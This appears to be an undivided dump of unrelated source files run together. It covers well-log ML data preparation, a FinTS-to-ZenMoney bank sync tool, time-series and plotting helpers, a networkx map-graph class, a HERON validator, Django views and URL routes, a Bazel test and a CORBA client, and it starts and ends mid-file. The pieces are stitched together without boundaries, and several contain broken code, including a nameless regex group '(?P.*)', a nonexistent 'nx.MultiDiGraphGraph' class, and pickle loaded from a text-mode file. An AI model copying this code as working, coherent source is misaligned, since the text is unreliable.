self.assertEqual(site_collection._neighbouring_sites, 'foo') if __name__ == '__main__': unittest.main() 1-10 """ Code to load and prep data """ import pandas as pd import numpy as np import os def load_log_data(): """ Return pandas dataframe of log data """ csv_path = os.path.join(os.path.dirname(__file__), '../data/HACKA_DS.csv') df = (pd.read_csv(csv_path, sep=';') .rename(columns=lambda x: x.strip()) ) return df def resample_well(df_well, feature_cols, sample_step): """ Resamples and interpolates data in a single well. """ # Resample df_well = df_well.copy() df_well = df_well.set_index('TVDSS') new_index = np.arange(int(df_well.index.min()), df_well.index.max(), sample_step) df_well = df_well.reindex(new_index, method='nearest', tolerance=sample_step) # Interpolate #for col in feature_cols: # df_well[col] = df_well[col].interpolate(method='index', limit=5, limit_area='inside') df_well.interpolate(method='index', limit=5, limit_area='inside', inplace=True) # Fill in nans for col in ['HACKANAME', 'RES_ID']: df_well[col] = df_well[col].fillna(method='bfill').fillna(method='ffill') return df_well.reset_index() def create_ml_dataframe(df, feature_cols=['GR'], feature_lags=range(0, 50, 2), label_cols=['GR'], label_lags=[2, 4, 6, 8, 10], dropna=True, sample_step=0.2): """ Create dataframe with 'features' and 'labels', from the raw log dataframe """ # Drop unused columns cols_to_keep = list(set(['TVDSS', 'HACKANAME', 'RES_ID'] + feature_cols + label_cols)) df_ml = df[cols_to_keep].copy() # Process each well in turn on TVDSS index df_ml = (df_ml.groupby('HACKANAME') .apply(resample_well, feature_cols, sample_step) .reset_index(drop=True)) # Feature lagging (above the current bit depth) for col in feature_cols: for lag in feature_lags: kwargs = {col + '_lag_' + str(lag): lambda x: x.groupby('HACKANAME')[col].shift(lag)} df_ml = df_ml.assign(**kwargs) # Label lagging (below the current bit depth) for col in label_cols: for lag in label_lags: kwargs = {col + '_futr_' + str(lag): lambda x: x.groupby('HACKANAME')[col].shift(-lag)} df_ml = df_ml.assign(**kwargs) if dropna: df_ml = df_ml.dropna() return df_ml def get_log_predictions(df_pred, well_name, bit_depth, tol=1): """ Lookup predictions indexed by depth """ prediction_col_names = [c for c in df_pred if 'pred' in c] pred_row = df_pred[(df_pred.HACKANAME == well_name) & (df_pred.TVDSS > bit_depth - tol) & (df_pred.TVDSS < bit_depth + tol) ] assert len(pred_row) > 0, 'No predictions found for that well near that depth' pred_row = pred_row.iloc[0:1, :] result = (pd.melt(pred_row, id_vars=['HACKANAME', 'TVDSS'], value_vars=prediction_col_names, var_name='pred_col' ) .rename(columns={'TVDSS': 'TVDSS_bit_depth'}) .assign(offset=lambda x: x['pred_col'].str.extract('(\d+)').astype('float')) .assign(log_name=lambda x: x['pred_col'].str.split('_').str[0]) .assign(model_name=lambda x: x['pred_col'].str.split('_').str[-1]) .assign(TVDSS=lambda x: x['TVDSS_bit_depth'] + x['offset']) ) return result fints2zen.py #!/usr/bin/env python # from argparse import ArgumentParser import os from argparse import ArgumentParser, Namespace, ArgumentDefaultsHelpFormatter from cerberus import Validator from datetime import datetime from fints.client import FinTS3PinTanClient from pprint import pprint from re import search from sys import exit, stderr from uuid import uuid4 from yaml import safe_load, dump from yaml.scanner import ScannerError from zenmoney import ( Diff, OAuth2, Request, Transaction, ZenObjectsList, timestamp, ZenMoneyException ) ''' First connection: * Get 
credentials for bank fin-ts (HBCI) and account info ''' class InterTransaction(tuple): ''' Helping class to sorting transactions by first element ''' def __lt__(self, other): return self[0] < other[0] class InterTransactions(list): ''' Intermidiate class to compare transaction from zenmoney and fints ''' def keys(self): return [i[0] for i in self] def compare_to(self, obj): s_only = self[:] o_only = obj[:] both = [] for s in s_only[:]: try: index = [o[0] for o in o_only].index(s[0]) both.append(((s[0]), ())) del(o_only[index]) s_only.remove(s) except ValueError: continue s_only.sort() o_only.sort() both.sort() return(InterTransactions(s_only), InterTransactions(both), InterTransactions(o_only)) class FinTs(object): ''' Class for data from FinTS banking API ''' date_patterns = ( # 2019-02-12T17:05:47 \/ (r'\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d', '%Y-%m-%dT%H:%M:%S'), (r'\d{4}\.\d\d\.\d\dT\d\d\.\d\d\.\d\d', '%Y.%m.%dT%H.%M.%S'), (r'\d\d\.\d\d \d{6}', '%d.%m %H%M%S'), # 14.02 163532 : 14.02163532ARN (r'\d\d\.\d{8}ARN', '%d.%m%H%M%SARN'), # 21.02164412ARN (r'\d\d\.\d\d \d\d\.\d\d', '%d.%m %H.%M'), # 12.02 09.56 # 08.01 09:00 : 08.0109.00 (r' \d\d\.\d\d \d\d:\d\d ', ' %d.%m %H:%M '), (r' \d\d\.\d{4}\.\d\d ', ' %d.%m%H.%M '), # 08.0109.00 (r'\d\d\.\d\d\.\d{4}', '%d.%m.%Y'), # 01.02.2019 ) transaction_types = ( # Type by posting_text ('Entgelt', 'Fee'), ('Gehalt/Rente', 'Salary/Pension'), ('Abbuchung', 'Debit entry'), ('Gutschrift', 'Credit/Top up'), ('Überweisung', 'Transfer'), ) def __init__(self, blz: str, username: str, pin: str, url: str, *args, **kwargs): _fints = FinTS3PinTanClient( str(blz), str(username), str(pin), str(url), *args, **kwargs, ) self.accounts = _fints.get_sepa_accounts() self.balance = {} self.transactions = {} for a in self.accounts: self.balance[a.iban] = _fints.get_balance(a) self.transactions[a.iban] = _fints.get_transactions(a) def _get_date(self, string, booking_date): ''' Accepts array from transaction info, returns the date First tries to get data from regexp+string format Then removes spaces from info string and tries to get isoformat Then returns date 'Buchung' (booking) ''' date = None for pattern in FinTs.date_patterns: s = search(pattern[0], string) if s: try: date = datetime.strptime(s[0], pattern[1]).date() except ValueError: # Trying to mitigate bools-t like 08.12360904ARN date = datetime.strptime(s[0][:5], '%d.%m').date() if not date: date = booking_date if date.year == 1900: if booking_date.month == 1 and date.month == 12: date = date.replace(year=booking_date.year-1) else: date = date.replace(year=booking_date.year) return str(date) def get_transactions(self, iban: str, account_uuid: str, transfer_uuid: str): ''' iban: the IBAN number in account account_uuid: account ID in zenmoney for the IBAN transfer_uuid: zenmoney account UUID for default withdraw ''' transactions = InterTransactions() for tr in self.transactions[iban]: tr = tr.data date = self._get_date(str(tr['purpose']), tr['date']) amount = float(tr['amount'].amount) # payee could be None payee = tr['applicant_name'] or '' if 0 < amount: income_amount = amount outcome_amount = 0.0 income_account = account_uuid outcome_account = account_uuid elif amount < 0: income_amount = 0.0 outcome_amount = -amount outcome_account = account_uuid # IngDiba related if payee.startswith('Bargeldauszahlung '): # If payee starts with the word, this is a withdraw payee = payee[18:] income_account = transfer_uuid income_amount = outcome_amount else: income_account = account_uuid else: # ignore service messages with amount == 
0 continue # IngDiba related if payee.startswith('VISA '): payee = payee[5:] currency = tr['currency'] comment = tr['purpose'] transactions.append(InterTransaction(( (date, amount, currency), {'date': date, 'income': income_amount, 'incomeAccount': income_account, 'incomeInstrument': 3, 'outcome': outcome_amount, 'outcomeAccount': outcome_account, 'outcomeInstrument': 3, 'originalPayee': payee.strip(), 'payee': payee.strip(), 'comment': comment, 'id': str(uuid4()), # '__raw': tr, } ))) return transactions class Zen(object): ''' Class for data from ZenMoney API ''' def __init__(self, token: str, serverTimestamp: int): self.api = Request(token) self.diff = self.api.diff(Diff( serverTimestamp=serverTimestamp, forceFetch=[ 'instrument', 'user', ]) ) def get_transactions(self, account_uuid: str): def get_amount(tr: Transaction): if tr.incomeAccount == tr.outcomeAccount == account_uuid: # Normal transaction amount = max(tr.income, tr.outcome) if 0 < tr.outcome: amount = -amount return amount, 'income' elif tr.incomeAccount == account_uuid: return tr.income, 'income' elif tr.outcomeAccount == account_uuid: return -tr.outcome, 'outcome' else: raise Exception('Something is definitely broken') transactions = InterTransactions() for tr in self.diff.transaction.by_account(account_uuid): if tr.deleted: continue amount, tr_type = get_amount(tr) tr_currency_id = getattr(tr, tr_type + 'Instrument') currency = self.diff.instrument.by_id(tr_currency_id).shortTitle transactions.append(InterTransaction(( ( str(tr.date), amount, currency ), {'date': tr.date, 'income': tr.income, 'incomeAccount': tr.incomeAccount, 'incomeInstrument': tr.incomeInstrument, 'outcome': tr.outcome, 'outcomeAccount': tr.outcomeAccount, 'outcomeInstrument': tr.outcomeInstrument, 'originalPayee': tr.originalPayee, 'comment': tr.comment, 'id': tr.id, } ))) return transactions v = Validator({ 'bank': {'type': 'dict', 'required': True, 'schema': { 'blz': {'required': True, 'type': 'integer'}, 'username': { 'required': True, 'anyof_type': ['string', 'integer'], }, 'pin': {'required': True, 'type': 'string'}, 'url': {'required': True, 'type': 'string'}, }}, 'zenmoney': {'required': True, 'type': 'dict', 'schema': { 'token': {'required': True, 'type': 'string'}, 'withdraw_account': {'required': True, 'type': 'string'}, }}, 'accounts': {'required': True, 'type': 'list', 'schema': { 'type': 'list', 'minlength': 2, 'maxlength': 2, 'schema': { 'type': 'string', 'regex': '^[-a-zA-Z0-9]+$', } }, 'minlength': 1} }) def get_config(filename: str) -> dict: """ Function to get or fill the config with the user interactive values Keyword argument: filename -- string with filename to read or write """ try: with open(filename) as c: config = safe_load(c) except FileNotFoundError: return write_config(filename) except ScannerError: stderr.write("Fail to read yaml config fom file {}".format(filename)) raise is_valid = v.validate(config) if not is_valid: stderr.write("Fail to validate the config: {}".format(v.errors)) exit(1) return config def write_config(filename: str) -> dict: ''' Fill the config with user input ''' config = {'bank': {}, 'zenmoney': {}, 'accounts': []} # type: dict print('Filling up the config from the input.\n' 'Please, enter your bank credentials') config['bank']['blz'] = int(input(' Please, enter blz (int): ')) config['bank']['username'] = str(input(' Please, enter username: ')) config['bank']['pin'] = str(input(' Please, enter pin: ')) config['bank']['url'] = str(input(' Please, enter url: ')) print('Checking finTS credentials') bank = 
FinTs( config['bank']['blz'], config['bank']['username'], config['bank']['pin'], config['bank']['url'], ) ibans = [a.iban for a in bank.accounts] print('Do you have a zenmoney oauth2 token?') if bool(int(input('1=Yes, 0=No [_1_/0]: ') or 1)): config['zenmoney']['token'] = str(input(' Please, enter token: ')) else: print('You should register your application for zenmoney API,' 'visit the page http://api.zenmoney.ru/consumer.html\n\n' 'Please, enter necessary information to generate user token') key = str(input(' Please, enter consumer_key: ')) secret = str(input(' Please, enter consumer_secret: ')) username = str(input(' Please, enter zenmoney username: ')) password = str(input(' Please, enter zenmoney password: ')) oauth = OAuth2(key, secret, username, password) config['zenmoney']['token'] = oauth.token print('Checking ZenMoney credentials') zen = Zen(config['zenmoney']['token'], 1) a_titles = [a.title for a in zen.diff.account] a_ids = [a.id for a in zen.diff.account] print('Next IBANs are available:\n {}'.format( '\n '.join(ibans) )) print('Next ZenMoney accounts are available:\n{}'.format( '\n'.join( [' {}: {}'.format(a[0], a[1]) for a in zip(a_titles, a_ids)] ) )) config['zenmoney']['withdraw_account'] = str(input( 'Enter the zenmoney account UUID for default withdraw transactions: ' )) print('Enter space separated pairs of "IBAN" "zenmoney_UUID" to sync') while True: pair = [str(x) for x in input('empty line to stop: ').split(maxsplit=1)] if not pair: break if pair[0] not in ibans: print('{} not belongs to {}\nTry again'.format( pair[0], ibans )) continue if pair[1] not in a_ids: print('{} not belongs to {}\nTry again'.format( pair[1], a_ids )) continue config['accounts'].append(pair) is_valid = v.validate(config) if not is_valid: stderr.write("Fail to validate the config: {}".format(v.errors)) exit(1) with open(filename, 'w') as c: c.write(dump(config)) print("Configuration is successfully written to {}".format(c.name)) return config def parse_args() -> Namespace: default_config = os.path.join( os.environ.get('APPDATA') or os.environ.get('XDG_CONFIG_HOME') or os.path.join(os.path.expandvars("$HOME"), '.config'), 'fints2zen.yaml' ) parser = ArgumentParser(formatter_class=ArgumentDefaultsHelpFormatter) parser.add_argument( '-c', '--config', default=default_config, type=str, help='application config, will be filled if file does not exist' ) parser.add_argument( '-m', '--mode', default='bulk', choices=['bulk', 'serial', 'dry-run'], help='"bulk" - send all transactions without approval,' ' "serial" - approve each transaction,' ' "dry-run" - only prints transactions to sync' ) return parser.parse_args() def bulk_send(zen: Zen, transactions: list) -> None: diff = Diff( serverTimestamp=timestamp(), transaction=transactions ) zen.api.diff(diff) def serial_send(zen: Zen, transactions: list) -> None: for tr in transactions: if bool(int(input('1=Yes, 0=No [_1_/0]: ') or 1)): diff = Diff( serverTimestamp=timestamp(), transaction=[tr] ) zen.api.diff(diff) def main(): args = parse_args() config = get_config(args.config) zen = Zen(config['zenmoney']['token'], 1) bank = FinTs(config['bank']['blz'], config['bank']['username'], config['bank']['pin'], config['bank']['url']) for pair in range(len(config['accounts'])): z_transactions = zen.get_transactions(config['accounts'][pair][1]) b_transactions = bank.get_transactions( config['accounts'][pair][0], config['accounts'][pair][1], config['zenmoney']['withdraw_account'] ) (only_zen, both, only_bank) = z_transactions.compare_to(b_transactions) print('Pair 
"{} to {}".\n' 'Amount of transactions only in bank: {}\n' 'Amount of transactions only in zenmoney: {}\n' 'Already synced: {}'.format( config['accounts'][pair][0], config['accounts'][pair][1], len(only_bank), len(only_zen), len(both) )) if not only_bank: continue bank_to_zen = [ Transaction(user=zen.diff.user[0].id, **i[1]) for i in only_bank ] try: suggest = zen.api.suggest(ZenObjectsList(bank_to_zen)) except ZenMoneyException as e: print(e.response.__dict__) raise print('Transactions to sync: ') pprint(suggest) if args.mode == 'bulk': bulk_send(zen, suggest) if args.mode == 'serial': serial_send(zen, suggest) if __name__ == '__main__': main() ThymeBoost/exogenous_models/decision_tree_exogenous.py # -*- coding: utf-8 -*- import numpy as np import pandas as pd from sklearn.tree import DecisionTreeRegressor from ThymeBoost.exogenous_models.exogenous_base_class import ExogenousBaseModel class DecisionTree(ExogenousBaseModel): model = 'decision_tree' def __init__(self): self.model_obj = None self.fitted = None def fit(self, y, X, **kwargs): tree_depth = kwargs['tree_depth'] exo_model = DecisionTreeRegressor(max_depth=tree_depth) self.model_obj = exo_model.fit(X, y) self.fitted = self.model_obj.predict(X) #exo_impact = (exo_model.params, fitted_model.cov_params()) return self.fitted def predict(self, future_exogenous): if isinstance(future_exogenous, pd.DataFrame): future_exogenous = future_exogenous.to_numpy() return self.model_obj.predict(future_exogenous) src/visualization.py import matplotlib.pyplot as plt import numpy as np def display_predictions(training_images, preds, training_truths=[], submission_outputs=[], samples=5): training_images = np.array(training_images) preds = np.array(preds) training_truths = np.array(training_truths) submission_outputs = np.array(submission_outputs) indices = np.random.choice(len(training_images), samples, replace=False) dim = preds[0].shape[0] columns = 3 if len(training_truths) == 0 and len(submission_outputs) == 0: columns = 2 for i in range(samples): ax1 = plt.subplot2grid((samples, columns), (i, 0)) ax1.imshow(training_images[indices][i]) ax1.axis('off') ax1.set_title('Original Image') ax2 = plt.subplot2grid((samples, columns), (i, 1)) ax2.imshow(preds[indices][i].reshape(dim, dim), cmap= 'Greys_r') ax2.axis('off') ax2.set_title('Predicted Mask') if len(training_truths) != 0: ax3 = plt.subplot2grid((samples, columns), (i, 2)) ax3.imshow(training_truths[indices][i].reshape(dim, dim), cmap= 'Greys_r') ax3.axis('off') ax3.set_title('Original Mask') if len(submission_outputs) != 0: ax3 = plt.subplot2grid((samples, columns), (i, 2)) ax3.imshow(submission_outputs[indices][i].reshape(dim, dim), cmap= 'Greys_r') ax3.axis('off') ax3.set_title('Submission Output') # Author: # Datetime:2021/7/7 # Copyright belongs to the author. # Please indicate the source for reprinting. 
import traceback from qpt.kernel.qos import Logging SUPPORT_AVX = None try: from paddle.fluid.core_avx import * SUPPORT_AVX = True except Exception as e: Logging.warning(str(e)) info = traceback.format_exc() if "cv2" in info: # ToDo 实际上还是不能确定,但Paddle这块不知道为什么要这样测cv2是否存在 SUPPORT_AVX = True else: SUPPORT_AVX = False 1-10 import networkx as nx import pickle class MapInfo: # skirmish simulation map with 4-way connected waypoints and FOV-based visibility constraints def __init__(self): self.g_acs = nx.DiGraph(method="get_action") # {node type: idx}, {node label: encoding} self.g_vis = nx.MultiDiGraph(method="get_distance") # {node type: idx}, {edge label: distance & directions} self.n_name = dict() # lookup table for nodes {name: idx} self.n_info = dict() # {idx: (x,z)} node X and Z absolute coordinates for 2D graph drawing self.counter = 0 def add_node_acs(self, node_name) -> bool: # add node to action graph and update node dict if node_name in self.n_name: return True self.counter += 1 idx = self.counter self.n_name[node_name] = idx self.g_acs.add_node(idx, code=node_name) return False def add_node_vis_by_name(self, node_name, attrs=None) -> bool: # add node to visual graph if node is in dict if node_name in self.n_name: self.g_vis.add_node(self.n_name[node_name]) # add node init attrs # self.g_vis.add_node(self.n_name[node_name], attrs) return False return True def add_node_vis_by_index(self, idx, **args) -> bool: # add node to visual graph if node is in dict if idx in range(1, len(self.n_name) + 1): self.g_vis.add_node(idx, **args) return False def add_edge_acs(self, u_name, v_name, attr) -> bool: # check node existence first, avoid to add new nodes here if u_name in self.n_name and v_name in self.n_name: self.g_acs.add_edge(self.n_name[u_name], self.n_name[v_name], action=attr) return False return True def add_edge_vis_fov(self, u_name, v_name, attr_dist, attr_type) -> bool: # check node first: avoid to add new node that is not in the lookup dict if u_name in self.n_name and v_name in self.n_name: u_node, v_node = self.n_name[u_name], self.n_name[v_name] # set the distance attribute to the first edge if there are parallel edges if self.g_vis.has_edge(u_node, v_node): self.g_vis.add_edge(u_node, v_node, type=attr_type) else: self.g_vis.add_edge(u_node, v_node, type=attr_type) self.g_vis[u_node][v_node][0]['dist'] = attr_dist return False return True def reset(self): # if not (nx.is_frozen(self.g_acs) and nx.is_frozen(self.g_vis)): # self.g_acs.clear() # self.g_vis.clear() self.g_acs = nx.DiGraph(method="get_action") self.g_vis = nx.MultiDiGraph(method="get_distance") self.n_name = dict() self.n_info = dict() self.counter = 0 def set_draw_attrs(self, node_name, x, z): # store 'pos' absolute coordinates attribute for drawing if node_name in self.n_name: idx = self.n_name[node_name] self.n_info[idx] = (x, z) return False def get_graph_size(self): return self.counter def get_graph_size_verbose(self): return self.counter, len(self.n_name), len(self.n_info), len(self.g_acs), len(self.g_vis) def get_index_by_name(self, node_name): return self.n_name[node_name] def get_name_by_index(self, index): return self.g_acs.nodes[index]["code"] def get_edge_attr_acs_by_idx(self, u_idx, v_idx): # no edge check for faster access return self.g_acs[u_idx][v_idx]["action"] def get_edge_attr_acs_by_name(self, u_name, v_name): # no edge check for faster access return self.g_acs[self.n_name[u_name]][self.n_name[v_name]]["action"] def get_edge_attr_vis_by_idx(self, u_idx, v_idx): # no edge check for faster access 
return self.g_vis[u_idx][v_idx][0]["dist"] def get_edge_attr_vis_fov_by_idx(self, u_idx, v_idx, u_dir): # check all parallel edges(u, v), return the distance value (>0) if the looking direction is valid dirs = [self.g_vis[u_idx][v_idx][idx]['type'] for idx in self.g_vis[u_idx][v_idx]] # return the distance value or a -1 indicator return self.g_vis[u_idx][v_idx][0]["dist"] if (u_dir in dirs) else -1 def get_actions_by_node(self, node_name): s_idx = self.get_index_by_name(node_name) ts_idx = list(nx.neighbors(self.g_acs, s_idx)) # send valid actions in ACTION_LOOKUP return [self.get_edge_attr_acs_by_idx(s_idx, t_idx) for t_idx in ts_idx] def get_all_states_by_node(self, node_name): s_idx = self.get_index_by_name(node_name) ts_idx = list(nx.neighbors(self.g_acs, s_idx)) # send the whole 1st order subgraph (current_index, list_of_neighbor_index, list_of_action_nums) return s_idx, ts_idx, [self.get_edge_attr_acs_by_idx(s_idx, t_idx) for t_idx in ts_idx] def draw_graphs(self): img_acs = nx.draw_networkx(self.g_acs, pos=self.n_info, arrows=True) img_vis = nx.draw_networkx(self.g_vis, pos=self.n_info, arrows=True, with_labels=True) return img_acs, img_vis def get_draw_info_graph_acs(self): # get node positions and labels for connectivity graph visualization g_pos = self.n_info g_node_labels = nx.get_node_attributes(self.g_acs, "code") return g_pos, g_node_labels def get_draw_info_graph_vis(self): # get node positions and labels for visibility graph visualization # connectivity graph and visibility graph have the same node orders g_edge_labels = nx.get_edge_attributes(self.g_vis, "dist") return g_edge_labels def save_plots_to_file(self, f_acs, f_vis) -> bool: import matplotlib.pyplot as plt from datetime import datetime ts = datetime.now() timestamp = "_{}-{}-{}-{}".format(ts.month, ts.day, ts.hour, ts.minute) # save the plot of connectivity graph plt.figure() plt.axis('off') nx.draw_networkx(self.g_acs, self.n_info, arrows=True) # directed edges overlap so just one directional edge label can be seen in image # g_edge_labels = nx.get_edge_attributes(self.g_acs, "action") # nx.draw_networkx_edge_labels(self.g_acs, self.n_info, edge_labels=g_edge_labels) plt.savefig("{}{}.png".format(f_acs, timestamp)) # save the plot of visibility graph plt.figure() plt.axis('off') nx.draw_networkx(self.g_vis, pos=self.n_info, with_labels=True) # edge labels are too dense which make it hard to get a clear view if plots all # g_edge_labels = nx.get_edge_attributes(self.g_vis, "dist") # nx.draw_networkx_edge_labels(self.g_vis, pos=self.n_info, edge_labels=g_edge_labels) plt.savefig("{}{}.png".format(f_vis, timestamp)) def save_graph_files(self, f_acs, f_vis, f_name, f_info) -> bool: # [!!!] IOs change node name type from Int (i.e. 11) ot Str (i.e. 
'11') # cause problems in drawing nx.write_gexf(self.g_acs, f_acs) nx.write_gexf(self.g_vis, f_vis) with open(f_name, 'wb+') as file: pickle.dump(self.n_name, file, pickle.HIGHEST_PROTOCOL) with open(f_info, 'wb+') as file: pickle.dump(self.n_info, file, pickle.HIGHEST_PROTOCOL) def load_graph_files(self, f_acs, f_vis, f_name, f_info) -> bool: self.g_acs = nx.read_gexf(f_acs) self.g_vis = nx.read_gexf(f_vis) with open(f_name, 'rb') as file: self.n_name = pickle.load(file) with open(f_info, 'rb') as file: self.n_info = pickle.load(file) # check length if len(self.n_name) == len(self.n_info) and len(self.n_name) == len(self.g_acs): self.counter = len(self.n_name) # nx.freeze(self.g_acs) # nx.freeze(self.g_vis) return False else: print("[GymEnv][IO] Fatal error while loading graph xml files..") return True def save_graph_pickle(self, f_acs, f_vis, f_name, f_info): # all data saved in the pickle fashion nx.write_gpickle(self.g_acs, f_acs) nx.write_gpickle(self.g_vis, f_vis) with open(f_name, 'wb+') as file: pickle.dump(self.n_name, file, pickle.HIGHEST_PROTOCOL) with open(f_info, 'wb+') as file: pickle.dump(self.n_info, file, pickle.HIGHEST_PROTOCOL) def load_graph_pickle(self, f_acs, f_vis, f_name, f_info) -> bool: self.g_acs = nx.read_gpickle(f_acs) self.g_vis = nx.read_gpickle(f_vis) with open(f_name, 'rb') as file: self.n_name = pickle.load(file) with open(f_info, 'rb') as file: self.n_info = pickle.load(file) # check length if len(self.n_name) == len(self.n_info) and len(self.n_name) == len(self.g_acs): self.counter = len(self.n_name) return False else: print("[GymEnv][IO] Fatal error while loading graph pickle files..") return True class ActGraph(nx.DiGraph): def __init__(self): super(nx.DiGraph, self).__init__() self.node_list = list() self.edge_relational = list() self.route_counter = 0 self.route_list = list() # type=RouteInfo() for multiple patrol routes class VisGraph(nx.Graph): def __init__(self): super(nx.MultiDiGraphGraph, self).__init__() self.edge_list = list() self.weights = list() self.positions = list() class RouteInfo: def __init__(self): # load from files self.list_code = list() # encodings of the nodes # generate in runtime self.list_node = list() # nodes in the patrol route self.list_move = list() # moving direction in the current step self.list_next = list() # moving direction in the next step for fast retrieval def save_route_pickle(self, f_route): with open(f_route, 'wb+') as file: pickle.dump(self.list_code, file, pickle.HIGHEST_PROTOCOL) def load_route_pickle(self, f_route): with open(f_route, 'rb') as file: self.list_code = pickle.load(file) def save_route(self, f_route): with open(f_route + '.pkl', 'wb+') as file: pickle.dump(self.list_code, file, pickle.HIGHEST_PROTOCOL) def load_route(self, f_route): with open(f_route + '.pkl', 'rb') as file: self.list_code = pickle.load(file) def add_node_to_route(self, node): self.list_code.append(node) def reset(self): pass def generate_path_graph(self): # self.g_pat = nx.path_graph(self.node_list) # self.g_pat.add_edge(self.get_node_by_index(-1), self.get_node_by_index(0)) # close loop pass def get_node_by_index(self, index: int) -> str: return self.list_code[index] def get_next_move_by_index(self, index: int): return self.list_next[index] def get_location_by_index(self, index: int): return self.list_node[index], self.list_code[index], self.list_move[index] def get_index_by_code(self, code: str) -> int: return self.list_code.index(code) def get_route_length(self) -> int: return len(self.list_code) 1-10 # Copyright 2020, 
Battelle Energy Alliance, LLC # ALL RIGHTS RESERVED """ Example class for validators. """ import numpy as np from utils import InputData, InputTypes from .Validator import Validator class Example(Validator): """ Example class for validating dispatch decisions. Arbitrarily, uses percent based ramping limits """ # --------------------------------------------- # INITIALIZATION @classmethod def get_input_specs(cls): """ Set acceptable input specifications. @ In, None @ Out, specs, InputData, specs """ specs = Validator.get_input_specs() specs.name = 'Example' specs.description = r"""Uses a demonstration-only validator that constrains the change for any resource to a constant ``delta''.""" specs.addSub(InputData.parameterInputFactory('delta', contentType=InputTypes.FloatType, descr=r"""the maximum absolute change in any resource between successive time steps.""")) specs.addSub(InputData.parameterInputFactory('tolerance', contentType=InputTypes.FloatType, descr=r"""the strictness with which the constraint should be enforced. Note that some small numerical exception is expected.""")) return specs def __init__(self): """ Constructor. @ In, None @ Out, None """ self.name = 'BaseValidator' self._allowable = 0.5 self._tolerance = 1e-14 def read_input(self, inputs): """ Loads settings based on provided inputs @ In, inputs, InputData.InputSpecs, input specifications @ Out, None """ delta = inputs.findFirst('delta') if delta: self._allowable = delta.value tol = inputs.findFirst('tolerance') if tol: self._tolerance = tol.value # --------------------------------------------- # API def validate(self, components, dispatch, times, meta): """ Method to validate a dispatch activity. @ In, components, list, HERON components whose cashflows should be evaluated @ In, activity, DispatchState instance, activity by component/resources/time @ In, times, np.array(float), time values to evaluate; may be length 1 or longer @ In, meta, dict, extra information pertaining to validation @ Out, errs, list, information about validation failures """ errs = [] # TODO best format for this? 
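# The loop below walks every component / tracking variable / resource / time
# step in the dispatch, computes the change ("delta") between consecutive time
# steps, and records an error entry whenever the absolute change exceeds the
# configured self._allowable ramp limit by more than self._tolerance. Each
# error also reports the boundary value ("limit") that would have satisfied
# the constraint and whether it is an upper or lower limit.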
for comp, info in dispatch._resources.items(): for tracker in comp.get_tracking_vars(): for res in info: for t, time in enumerate(times): current = dispatch.get_activity(comp, tracker, res, time) if comp.get_interaction().is_type('Storage') and t == 0: init_level = comp.get_interaction().get_initial_level(meta) if t > 0: previous = dispatch.get_activity(comp, tracker, res, times[t-1]) delta = current - previous sign = np.sign(delta) if abs(delta) - self._allowable > self._tolerance: errs.append({'msg': f'Exceeded ramp of {self._allowable} with {delta:1.8e}', 'limit': previous + (sign * self._allowable), 'limit_type': 'lower' if (sign < 0) else 'upper', 'component': comp, 'resource': res, 'time': time, 'time_index': t, }) return errs import sys,pickle def usage(): print(""" pretty print the possible call trees over a given routine name from the routines listed in .mkdep_routines usage: calltree ROUTINE """) sys.exit(2) def print_names(names, dict, level, stack=[]): level += " " for name in names: file= "" if name in dict: file = dict[name][0] print((level+name).ljust(60) + file) if name in stack: print(level + "Recursion?") return stack.append(name) if name in dict: print_names(dict[name][1], dict, level, stack) last = stack.pop() # get the routines dictionary from the restart file f=open('.mkdep_restart_file','r') for fivetimes in [1,2,3,4,5]: routines = pickle.load(f) f.close() if len(sys.argv)<2: usage() print("In the trees of the current mkdep run (.mkdep_restart_file)") print("the possible tree over "+sys.argv[1]+" looks like the below;") level="" stack=[] print_names([sys.argv[1]], routines, level, stack) from django.shortcuts import render from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView from rest_framework.permissions import IsAuthenticated from babies.models import Babies from tracker.models import Tracker from tracker.serializers import TrackerSerializer # Create your views here. class TrackerList(ListCreateAPIView): """ List all records, or create a new record. """ serializer_class = TrackerSerializer def perform_create(self, serializer): name = self.kwargs['name'] baby = Babies.objects.get(name=name) serializer.save(baby=baby) def get_queryset(self): """ restrics returned records to a given baby by filtering against a 'name' query parameter in the URL. 
""" queryset = Tracker.objects.all() name = self.kwargs['name'] queryset = queryset.filter(baby__name=name) return queryset class TrackerDetail(RetrieveUpdateDestroyAPIView): """ Retrive, update or delete a record instance """ queryset = Tracker.objects.all() serializer_class = TrackerSerializer 0 from typing import Dict TranslationDict = Dict[str, Dict[str, str]] dp_tornado/helper/web/http/delete.py # -*- coding: utf-8 -*- from dp_tornado.engine.helper import Helper as dpHelper class DeleteHelper(dpHelper): def raw(self, url, **kwargs): return self.helper.web.http.request(req_type='delete', res_type='raw', url=url, **kwargs) def json(self, url, **kwargs): return self.helper.web.http.request(req_type='delete', res_type='json', url=url, **kwargs) def text(self, url, **kwargs): return self.helper.web.http.request(req_type='delete', res_type='text', url=url, **kwargs) def html(self, url, **kwargs): return self.helper.web.http.request(req_type='delete', res_type='html', url=url, **kwargs) moviesite/moviesite/urls.py from django.conf.urls import patterns, include, url from django.contrib import admin from django.conf import settings from django.conf.urls.static import static urlpatterns = patterns('', url(r'^recommender/', include('recommender.urls', namespace = "recommender")), url(r'^polls/', include('polls.urls', namespace = "polls")), url(r'^', include('mainp.urls', namespace = "mainp")), url(r'^movielists/', include('movielists.urls', namespace = "movielists")), url(r'^admin/', include(admin.site.urls)), ) urlpatterns += patterns('', url(r'^media/(?P.*)$', 'django.views.static.serve', { 'document_root': settings.MEDIA_ROOT, }), ) import pygame as pg import pygame_widgets as pw load("//rules/analysis_tests:identical_outputs_test.bzl", "identical_outputs_test") def make_tests(): identical_outputs_test( name = "test_DependencyEquivilance", target_under_test = ":AppWithSelectableCopts", # These inputs *must* be passed seperately, in order to # have different transitions applied by Skyframe. deps = [":AppWithSelectableCopts", ":SwiftLib"], ) native.test_suite( name = "AnalysisTests", tests = [ ":test_DependencyEquivilance", ], ) src/InstaFriend.py class InstaFriend(object): def __init__(self, name): self.name = name def say_something(self): print(self.name)0 """ Provide a client for CORBA services which initialize CORBA automatically and create client to wanted HPP services. """ class CorbaError(Exception): """ Raised when a CORBA error occurs. """ def __init__(self, value): self.value = value def __str__(self): return repr(self.value) class Client: """ Connect and create clients for all HPP services. """ defaultClients = [('gui', 'GraphicalInterface')] def initWithNameService (self, urlNameService): import CosNaming from .gepetto.corbaserver import GraphicalInterface obj = self.orb.string_to_object (urlNameService) self.rootContext = obj._narrow(CosNaming.NamingContext) if self.rootContext is None: 